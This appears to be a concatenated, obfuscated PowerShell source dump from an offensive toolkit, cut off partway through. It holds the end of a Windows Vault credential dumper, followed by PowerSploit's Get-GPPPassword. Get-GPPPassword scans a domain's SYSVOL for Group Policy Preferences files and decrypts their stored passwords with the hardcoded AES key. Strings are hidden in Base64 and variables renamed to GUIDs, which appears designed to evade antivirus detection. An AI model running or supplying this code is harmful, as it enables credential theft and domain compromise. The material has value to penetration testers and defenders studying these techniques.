        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQA1ADQARQAyADMARAAwAC0AQwA2ADQANAAtADQARQA2AEYALQA4AEMARQA2AC0ANQAwADYAOQAyADcAMgBGADkAOQA5AEYA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABQAGkAYwBrAGUAcgAgAFAAcgBvAHQAZQBjAHQAbwByAA==')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NABCAEYANABDADQANAAyAC0AOQBCADgAQQAtADQAMQBBADAALQBCADMAOAAwAC0ARABEADQAQQA3ADAANABEAEQAQgAyADgA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBlAGIAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMA')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NwA3AEIAQwA1ADgAMgBCAC0ARgAwAEEANgAtADQARQAxADUALQA0AEUAOAAwAC0ANgAxADcAMwA2AEIANgBGADMAQgAyADkA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA=')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQA2ADkARAA3ADgAMwA4AC0AOQAxAEIANQAtADQARgBDADkALQA4ADkARAA1AC0AMgAzADAARAA0AEQANABDAEMAMgBCAEMA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEQAbwBtAGEAaQBuACAAQwBlAHIAdABpAGYAaQBjAGEAdABlACAAQwByAGUAZABlAG4AdABpAGEAbAA=')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwBFADAARQAzADUAQgBFAC0AMQBCADcANwAtADQAMwBFADcALQBCADgANwAzAC0AQQBFAEQAOQAwADEAQgA2ADIANwA1AEIA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEQAbwBtAGEAaQBuACAAUABhAHMAcwB3AG8AcgBkACAAQwByAGUAZABlAG4AdABpAGEAbAA=')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwBDADgAOAA2AEYARgAzAC0AMgA2ADYAOQAtADQAQQBBADIALQBBADgARgBCAC0AMwBGADYANwA1ADkAQQA3ADcANQA0ADgA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEUAeAB0AGUAbgBkAGUAZAAgAEMAcgBlAGQAZQBuAHQAaQBhAGwA')))
        ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAwADAAMAAwADAAMAAwAC0AMAAwADAAMAAtADAAMAAwADAALQAwADAAMAAwAC0AMAAwADAAMAAwADAAMAAwADAAMAAwADAA')))) = $null
    }
    # Zero-count guard: without it, 1..0 would iterate over 1 and 0.
    if (${24c8469bf285440a875de4a34cd79305})
    {
        foreach ($i in 1..${24c8469bf285440a875de4a34cd79305})
        {
            # Read the next GUID from the native array and advance the cursor by
            # SizeOf([Guid]).
            ${fee04732c23a47ecacf759098477b7c2} = [Runtime.InteropServices.Marshal]::PtrToStructure(${a182138fef914c68bf31f8516530b664}, [Type] [Guid])
            ${a182138fef914c68bf31f8516530b664} = [IntPtr] (${a182138fef914c68bf31f8516530b664}.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid]))
            ${34c503abdf824ff9bb9e662b1da95cf4} = [IntPtr]::Zero
            Write-Verbose "Opening vault - $(${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]) ($(${fee04732c23a47ecacf759098477b7c2}))"
            ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultOpenVault([Ref] ${fee04732c23a47ecacf759098477b7c2}, 0, [Ref] ${34c503abdf824ff9bb9e662b1da95cf4})
            # A vault that cannot be opened is reported and skipped (no handle
            # to close in this branch).
            if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0)
            {
                Write-Error "Unable to open the following vault: $(${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]). Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))"
                continue
            }
            # Enumerate items with flags 512; ${d550...} receives the count and
            # ${3422...} the native item array.
            ${d55006db11114242a5777a6348d5bbd5} = 0
            ${3422e1ed3b09486bb38afaf666e5f736} = [IntPtr]::Zero
            ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultEnumerateItems(${34c503abdf824ff9bb9e662b1da95cf4}, 512, [Ref] ${d55006db11114242a5777a6348d5bbd5}, [Ref] ${3422e1ed3b09486bb38afaf666e5f736})
            if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0)
            {
                # The handle was opened successfully above, so close it before
                # skipping this vault.
                $null = ${208b5b442263465081f8b114a5784fcf}::VaultCloseVault([Ref] ${34c503abdf824ff9bb9e662b1da95cf4})
                Write-Error "Unable to enumerate vault items from the following vault: $(${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]). Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))"
                continue
            }
            ${4d7c47515f0b42e788329f442342706c} = ${3422e1ed3b09486bb38afaf666e5f736}
            # Same zero-count guard as for the vault loop.
            if (${d55006db11114242a5777a6348d5bbd5})
            {
                foreach ($j in 1..${d55006db11114242a5777a6348d5bbd5})
                {
                    # Marshal the next item header and advance by the struct
                    # size; the struct size itself depends on version gate 1.
                    ${12854c7cf3554f48b8f7ba7fd8301150} = [Runtime.InteropServices.Marshal]::PtrToStructure(${4d7c47515f0b42e788329f442342706c}, [Type] ${f2d61ec8abbe45409ddbd8773eb71409})
                    ${4d7c47515f0b42e788329f442342706c} = [IntPtr] (${4d7c47515f0b42e788329f442342706c}.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] ${f2d61ec8abbe45409ddbd8773eb71409}))
                    ${90eaee31c17d44e19fbab5b9722ce6b8} = [IntPtr]::Zero
                    # Fetch the full item (including its authenticator element)
                    # into a native buffer ${90ea...}; the argument list must
                    # match the declaration chosen by version gate 2.
                    if (${bd40dfe484f544f5ac49b71a65f7b35a} -ge 6 -and ${9cad0d1e6b2e48439dde28800f64a4c9} -ge 2)
                    {
                        ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultGetItem(${34c503abdf824ff9bb9e662b1da95cf4},
                            [Ref] ${12854c7cf3554f48b8f7ba7fd8301150}.SchemaId,
                            ${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement,
                            ${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement,
                            ${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid,
                            [IntPtr]::Zero,
                            0,
                            [Ref] ${90eaee31c17d44e19fbab5b9722ce6b8})
                    }
                    else
                    {
                        ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultGetItem(${34c503abdf824ff9bb9e662b1da95cf4},
                            [Ref] ${12854c7cf3554f48b8f7ba7fd8301150}.SchemaId,
                            ${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement,
                            ${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement,
                            [IntPtr]::Zero,
                            0,
                            [Ref] ${90eaee31c17d44e19fbab5b9722ce6b8})
                    }
                    ${c0dfec4826e949428ac400c44f17acd3} = $null
                    # On failure nothing was returned in ${90ea...}, so the
                    # `continue` skips VaultFree legitimately.
                    if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0)
                    {
                        Write-Error "Error occured retrieving vault item. Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))"
                        continue
                    }
                    else
                    {
                        ${c0dfec4826e949428ac400c44f17acd3} = [Runtime.InteropServices.Marshal]::PtrToStructure(${90eaee31c17d44e19fbab5b9722ce6b8}, [Type] ${f2d61ec8abbe45409ddbd8773eb71409})
                    }
                    # Display name from the lookup table, else the raw GUID.
                    if (${a49e774fea8b4e23905aabb599ed6413}.ContainsKey(${fee04732c23a47ecacf759098477b7c2}))
                    {
                        ${6d6565286bd247ea9ce35ef454c6bff0} = ${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]
                    }
                    else
                    {
                        ${6d6565286bd247ea9ce35ef454c6bff0} = ${fee04732c23a47ecacf759098477b7c2}
                    }
                    # The authenticator element comes from the fetched item, not
                    # from the enumeration header; guarded against IntPtr::Zero
                    # because the helper's ValidateScript rejects it.
                    if (${c0dfec4826e949428ac400c44f17acd3}.pAuthenticatorElement -ne [IntPtr]::Zero)
                    {
                        ${4d48240fee0e491fb5f033c271c12a21} = Get-VaultElementValue ${c0dfec4826e949428ac400c44f17acd3}.pAuthenticatorElement
                    }
                    else
                    {
                        ${4d48240fee0e491fb5f033c271c12a21} = $null
                    }
                    # pPackageSid exists only when gate 1 added the field; the
                    # first operand tolerates its absence (property is $null).
                    ${6b0dc8d0b7e84a0d9e3caf46f53a5fcc} = $null
                    if (${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid -and (${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid -ne [IntPtr]::Zero))
                    {
                        ${6b0dc8d0b7e84a0d9e3caf46f53a5fcc} = Get-VaultElementValue ${12854c7cf3554f48b8f7ba7fd8301150}.pPackageSid
                    }
                    # Output record; LastModified is a FILETIME converted to UTC.
                    ${d531d996545645a088706457d3807a34} = @{
                        Vault = ${6d6565286bd247ea9ce35ef454c6bff0}
                        Resource = if (${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement) { Get-VaultElementValue ${12854c7cf3554f48b8f7ba7fd8301150}.pResourceElement } else { $null }
                        Identity = if (${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement) { Get-VaultElementValue ${12854c7cf3554f48b8f7ba7fd8301150}.pIdentityElement } else { $null }
                        PackageSid = ${6b0dc8d0b7e84a0d9e3caf46f53a5fcc}
                        Credential = ${4d48240fee0e491fb5f033c271c12a21}
                        LastModified = [DateTime]::FromFileTimeUtc(${12854c7cf3554f48b8f7ba7fd8301150}.LastModified)
                    }
                    ${ae1e01228c4e47fe9920e3715d774bb4} = New-Object PSObject -Property ${d531d996545645a088706457d3807a34}
                    ${ae1e01228c4e47fe9920e3715d774bb4}.PSObject.TypeNames[0] = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBBAFUATABUAEMATABJAC4AVgBBAFUATABUAEkAVABFAE0A')))
                    ${ae1e01228c4e47fe9920e3715d774bb4}
                    # Release the per-item buffer returned by VaultGetItem.
                    $null = ${208b5b442263465081f8b114a5784fcf}::VaultFree(${90eaee31c17d44e19fbab5b9722ce6b8})
                }
            }
            $null = ${208b5b442263465081f8b114a5784fcf}::VaultCloseVault([Ref] ${34c503abdf824ff9bb9e662b1da95cf4})
        }
    }
}
-------------------------------------------------------------------------------- /Invoke-GPPPassword.ps1: -------------------------------------------------------------------------------- 1 | function Get-GPPPassword { 2 | <# 3 | .SYNOPSIS 4 | 5 | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. 6 | 7 | PowerSploit Function: Get-GPPPassword 8 | Author: Chris Campbell (@obscuresec) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | 13 | .DESCRIPTION 14 | 15 | Get-GPPPassword searches the domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords. 
16 | 17 | .EXAMPLE 18 | 19 | PS C:\> Get-GPPPassword 20 | 21 | NewName : [BLANK] 22 | Changed : {2014-02-21 05:28:53} 23 | Passwords : {password12} 24 | UserNames : {test1} 25 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml 26 | 27 | NewName : {mspresenters} 28 | Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} 29 | Passwords : {Recycling*3ftw!, password123, password1234} 30 | UserNames : {Administrator (built-in), DummyAccount, dummy2} 31 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml 32 | 33 | NewName : [BLANK] 34 | Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} 35 | Passwords : {password, password1234$} 36 | UserNames : {administrator, admin} 37 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml 38 | 39 | NewName : [BLANK] 40 | Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} 41 | Passwords : {password, read123} 42 | UserNames : {DEMO\Administrator, admin} 43 | File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml 44 | 45 | .EXAMPLE 46 | 47 | PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq 48 | 49 | password 50 | password12 51 | password123 52 | password1234 53 | password1234$ 54 | read123 55 | Recycling*3ftw! 
56 | 57 | .LINK 58 | 59 | http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html 60 | https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 61 | http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences 62 | http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html 63 | #> 64 | [CmdletBinding()] 65 | Param () 66 | Set-StrictMode -Version 2 67 | function Get-DecryptedCpassword { 68 | [CmdletBinding()] 69 | Param ( 70 | [string] ${e4aae6794a454054ab0e31882001249c} 71 | ) 72 | try { 73 | ${205bb5891ffe47f5b576b5bbe1811082} = (${e4aae6794a454054ab0e31882001249c}.length % 4) 74 | switch (${205bb5891ffe47f5b576b5bbe1811082}) { 75 | '1' {${e4aae6794a454054ab0e31882001249c} = ${e4aae6794a454054ab0e31882001249c}.Substring(0,${e4aae6794a454054ab0e31882001249c}.Length -1)} 76 | '2' {${e4aae6794a454054ab0e31882001249c} += ('=' * (4 - ${205bb5891ffe47f5b576b5bbe1811082}))} 77 | '3' {${e4aae6794a454054ab0e31882001249c} += ('=' * (4 - ${205bb5891ffe47f5b576b5bbe1811082}))} 78 | } 79 | ${2beff11a79b9489db2695bbc9c70d3b6} = [Convert]::FromBase64String(${e4aae6794a454054ab0e31882001249c}) 80 | ${0b8fd8afaef146ef856ffdf1593f5587} = New-Object System.Security.Cryptography.AesCryptoServiceProvider 81 | [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8, 82 | 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b) 83 | ${fa2e77277a0e43cb89bb5a2e099cb613} = New-Object Byte[](${0b8fd8afaef146ef856ffdf1593f5587}.IV.Length) 84 | ${0b8fd8afaef146ef856ffdf1593f5587}.IV = ${fa2e77277a0e43cb89bb5a2e099cb613} 85 | ${0b8fd8afaef146ef856ffdf1593f5587}.Key = $AesKey 86 | ${91bd48cd909f4b91a7f46f9969d0001d} = ${0b8fd8afaef146ef856ffdf1593f5587}.CreateDecryptor() 87 | [Byte[]] $OutBlock = ${91bd48cd909f4b91a7f46f9969d0001d}.TransformFinalBlock(${2beff11a79b9489db2695bbc9c70d3b6}, 0, 
${2beff11a79b9489db2695bbc9c70d3b6}.length) 88 | return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock) 89 | } 90 | catch {Write-Error $Error[0]} 91 | } 92 | function Get-GPPInnerFields { 93 | [CmdletBinding()] 94 | Param ( 95 | ${b1372a912a6c4da5b57ac2089f6eb19b} 96 | ) 97 | try { 98 | ${5e1021a707344c0e91486ac863355fda} = Split-Path ${b1372a912a6c4da5b57ac2089f6eb19b} -Leaf 99 | [xml] $Xml = gc (${b1372a912a6c4da5b57ac2089f6eb19b}) 100 | ${e4aae6794a454054ab0e31882001249c} = @() 101 | ${aae7b762662c4728a463d10885e00a19} = @() 102 | ${0c502df0b6474f4d8f075877af0af87d} = @() 103 | ${b4166a3f22e74d49aad4b9e8ed582950} = @() 104 | ${3c1ee35bd9b94daba7c6354654745097} = @() 105 | if ($Xml.innerxml -like $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KgBjAHAAYQBzAHMAdwBvAHIAZAAqAA==')))){ 106 | Write-Verbose "Potential password in ${b1372a912a6c4da5b57ac2089f6eb19b}" 107 | switch (${5e1021a707344c0e91486ac863355fda}) { 108 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwByAG8AdQBwAHMALgB4AG0AbAA='))) { 109 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABjAHAAYQBzAHMAdwBvAHIAZAA='))) | select -Expand Node | % {$_.Value} 110 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQAB1AHMAZQByAE4AYQBtAGUA'))) | select -Expand Node | % {$_.Value} 111 | ${0c502df0b6474f4d8f075877af0af87d} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABuAGUAdwBOAGEAbQBlAA=='))) | select -Expand Node | % {$_.Value} 112 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBHAHIAbwB1AHAAcwAvAFUAcwBlAHIALwBAAGMAaABhAG4AZwBlAGQA'))) | select -Expand Node | % {$_.Value} 113 | } 114 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHIAdgBpAGMAZQBzAC4AeABtAGwA'))) { 115 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBOAFQAUwBlAHIAdgBpAGMAZQBzAC8ATgBUAFMAZQByAHYAaQBjAGUALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABjAHAAYQBzAHMAdwBvAHIAZAA='))) | select -Expand Node | % {$_.Value} 116 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBOAFQAUwBlAHIAdgBpAGMAZQBzAC8ATgBUAFMAZQByAHYAaQBjAGUALwBQAHIAbwBwAGUAcgB0AGkAZQBzAC8AQABhAGMAYwBvAHUAbgB0AE4AYQBtAGUA'))) | select -Expand Node | % {$_.Value} 117 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBOAFQAUwBlAHIAdgBpAGMAZQBzAC8ATgBUAFMAZQByAHYAaQBjAGUALwBAAGMAaABhAG4AZwBlAGQA'))) | select -Expand Node | % {$_.Value} 118 | } 119 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAdABhAHMAawBzAC4AeABtAGwA'))) { 120 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAHMALwBUAGEAcwBrAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAYwBwAGEAcwBzAHcAbwByAGQA'))) | select -Expand Node | % {$_.Value} 121 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAHMALwBUAGEAcwBrAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAcgB1AG4AQQBzAA=='))) | select -Expand Node | % {$_.Value} 122 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAHMALwBUAGEAcwBrAC8AQABjAGgAYQBuAGcAZQBkAA=='))) | select -Expand Node | % {$_.Value} 123 | } 124 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAHQAYQBTAG8AdQByAGMAZQBzAC4AeABtAGwA'))) { 125 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAGEAdABhAFMAbwB1AHIAYwBlAHMALwBEAGEAdABhAFMAbwB1AHIAYwBlAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAYwBwAGEAcwBzAHcAbwByAGQA'))) | select -Expand Node | % {$_.Value} 126 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAGEAdABhAFMAbwB1AHIAYwBlAHMALwBEAGEAdABhAFMAbwB1AHIAYwBlAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAdQBzAGUAcgBuAGEAbQBlAA=='))) | select -Expand Node | % {$_.Value} 127 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAGEAdABhAFMAbwB1AHIAYwBlAHMALwBEAGEAdABhAFMAbwB1AHIAYwBlAC8AQABjAGgAYQBuAGcAZQBkAA=='))) | select -Expand Node | % {$_.Value} 128 | } 129 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAbgB0AGUAcgBzAC4AeABtAGwA'))) { 130 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBQAHIAaQBuAHQAZQByAHMALwBTAGgAYQByAGUAZABQAHIAaQBuAHQAZQByAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAYwBwAGEAcwBzAHcAbwByAGQA'))) | select -Expand Node | % {$_.Value} 131 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBQAHIAaQBuAHQAZQByAHMALwBTAGgAYQByAGUAZABQAHIAaQBuAHQAZQByAC8AUAByAG8AcABlAHIAdABpAGUAcwAvAEAAdQBzAGUAcgBuAGEAbQBlAA=='))) | select -Expand Node | % {$_.Value} 132 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBQAHIAaQBuAHQAZQByAHMALwBTAGgAYQByAGUAZABQAHIAaQBuAHQAZQByAC8AQABjAGgAYQBuAGcAZQBkAA=='))) | select -Expand Node | % {$_.Value} 133 | } 134 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAByAGkAdgBlAHMALgB4AG0AbAA='))) { 135 | ${e4aae6794a454054ab0e31882001249c} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAHIAaQB2AGUAcwAvAEQAcgBpAHYAZQAvAFAAcgBvAHAAZQByAHQAaQBlAHMALwBAAGMAcABhAHMAcwB3AG8AcgBkAA=='))) | select -Expand Node | % {$_.Value} 136 | ${aae7b762662c4728a463d10885e00a19} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAHIAaQB2AGUAcwAvAEQAcgBpAHYAZQAvAFAAcgBvAHAAZQByAHQAaQBlAHMALwBAAHUAcwBlAHIAbgBhAG0AZQA='))) | select -Expand Node | % {$_.Value} 137 | ${b4166a3f22e74d49aad4b9e8ed582950} += , $Xml | Select-Xml $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LwBEAHIAaQB2AGUAcwAvAEQAcgBpAHYAZQAvAEAAYwBoAGEAbgBnAGUAZAA='))) | select -Expand Node | % {$_.Value} 138 | } 139 | } 140 | } 141 | foreach ($Pass in ${e4aae6794a454054ab0e31882001249c}) { 142 | Write-Verbose "Decrypting $Pass" 143 | ${21604aea1ec54a688b80a97d1c38ab95} = Get-DecryptedCpassword $Pass 144 | Write-Verbose "Decrypted a password of ${21604aea1ec54a688b80a97d1c38ab95}" 145 | ${3c1ee35bd9b94daba7c6354654745097} += , ${21604aea1ec54a688b80a97d1c38ab95} 146 | } 147 | if (!(${3c1ee35bd9b94daba7c6354654745097})) {${3c1ee35bd9b94daba7c6354654745097} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 148 | if (!(${aae7b762662c4728a463d10885e00a19})) {${aae7b762662c4728a463d10885e00a19} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 149 | if (!(${b4166a3f22e74d49aad4b9e8ed582950})) {${b4166a3f22e74d49aad4b9e8ed582950} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 150 | 
if (!(${0c502df0b6474f4d8f075877af0af87d})) {${0c502df0b6474f4d8f075877af0af87d} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('WwBCAEwAQQBOAEsAXQA=')))} 151 | ${98e95e02299745609b19392a6259cb51} = @{'Passwords' = ${3c1ee35bd9b94daba7c6354654745097}; 152 | 'UserNames' = ${aae7b762662c4728a463d10885e00a19}; 153 | 'Changed' = ${b4166a3f22e74d49aad4b9e8ed582950}; 154 | 'NewName' = ${0c502df0b6474f4d8f075877af0af87d}; 155 | 'File' = ${b1372a912a6c4da5b57ac2089f6eb19b}} 156 | ${069964c2c7d14dad9c2b57e19a7a4099} = New-Object -TypeName PSObject -Property ${98e95e02299745609b19392a6259cb51} 157 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABoAGUAIABwAGEAcwBzAHcAbwByAGQAIABpAHMAIABiAGUAdAB3AGUAZQBuACAAewB9ACAAYQBuAGQAIABtAGEAeQAgAGIAZQAgAG0AbwByAGUAIAB0AGgAYQBuACAAbwBuAGUAIAB2AGEAbAB1AGUALgA='))) 158 | if (${069964c2c7d14dad9c2b57e19a7a4099}) {Return ${069964c2c7d14dad9c2b57e19a7a4099}} 159 | } 160 | catch {Write-Error $Error[0]} 161 | } 162 | try { 163 | if ( ( ((gwmi Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { 164 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBhAGMAaABpAG4AZQAgAGkAcwAgAG4AbwB0ACAAYQAgAGQAbwBtAGEAaQBuACAAbQBlAG0AYgBlAHIAIABvAHIAIABVAHMAZQByACAAaQBzACAAbgBvAHQAIABhACAAbQBlAG0AYgBlAHIAIABvAGYAIAB0AGgAZQAgAGQAbwBtAGEAaQBuAC4A'))) 165 | } 166 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAGEAcgBjAGgAaQBuAGcAIAB0AGgAZQAgAEQAQwAuACAAVABoAGkAcwAgAGMAbwB1AGwAZAAgAHQAYQBrAGUAIABhACAAdwBoAGkAbABlAC4A'))) 167 | ${8a83da17e81e465a99ef9e9a98706449} = ls -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwByAG8AdQBwAHMALgB4AG0AbAA='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAHIAdgBpAGMAZQBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAdABhAHMAawBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABhAHQAYQBTAG8AdQByAGMAZQBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAGkAbgB0AGUAcgBzAC4AeABtAGwA'))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RAByAGkAdgBlAHMALgB4AG0AbAA='))) 168 | if ( -not ${8a83da17e81e465a99ef9e9a98706449} ) {throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAGYAaQBsAGUAcwAgAGYAbwB1AG4AZAAuAA==')))} 169 | Write-Verbose "Found $(${8a83da17e81e465a99ef9e9a98706449} | measure | select -ExpandProperty Count) files that could contain passwords." 170 | foreach (${b1372a912a6c4da5b57ac2089f6eb19b} in ${8a83da17e81e465a99ef9e9a98706449}) { 